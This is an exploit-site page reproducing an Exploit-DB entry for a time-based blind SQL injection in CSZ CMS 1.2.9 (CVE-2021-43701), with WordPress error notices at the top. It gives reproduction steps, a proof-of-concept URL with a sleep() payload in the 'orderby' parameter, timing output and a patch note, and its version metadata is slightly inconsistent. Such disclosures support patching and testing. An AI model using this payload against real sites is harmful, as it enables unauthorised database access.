Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-import-export-lite domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the insert-headers-and-footers domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121

Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6121
CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated) - exploit.company
header-logo
Suggest Exploit
vendor:
CSZ CMS
by:
Rahad Chowdhury
6.5
CVSS
MEDIUM
Blind SQL Injection
89
CWE
Product Name: CSZ CMS
Affected Version From: 1.2.2009
Affected Version To: 1.2.2009
Patch Exists: Yes
Related CWE: CVE-2021-43701
CPE: a:cszcms:csz_cms:1.2.9
Metasploit:
Other Scripts:
Platforms Tested: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
2021

CSZ CMS 1.2.9 – ‘Multiple’ Blind SQLi(Authenticated)

CSZ CMS 1.2.9 is vulnerable to Blind SQL Injection. An authenticated user can inject malicious SQL queries in the 'fieldS[]' or 'orderby' parameter of the 'General Menu > CSV Export / Import' page. By issuing sleep(0) response will be delayed to 0 seconds. By issuing sleep(1) response will be delayed to 1 seconds. By issuing sleep(5) response will be delayed to 5 seconds. By issuing sleep(10) response will be delayed to 10 seconds.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of CSZ CMS.
Source

Exploit-DB raw data:

# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)
# Date: 2021-04-14
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip
# Version: 1.2.9
# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46
# CVE: CVE-2021-43701

*Steps to Reproduce:*
1. First login to your Admin Panel
2. then go to "General Menu > CSV Export / Import".
3. open burp site and configure with browser.
4. then select any "Table Name" > Select "Fields Select" and Select "Sort by"
5. Now click "Export to CSV" and intercept with burp suite
6. "fieldS[]" or "orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)" in "orderby" parameter.

*Proof of Concept:*
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV

*Output:*
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds

Navigation

Suggest Exploit

Services By CQR

cqrsecured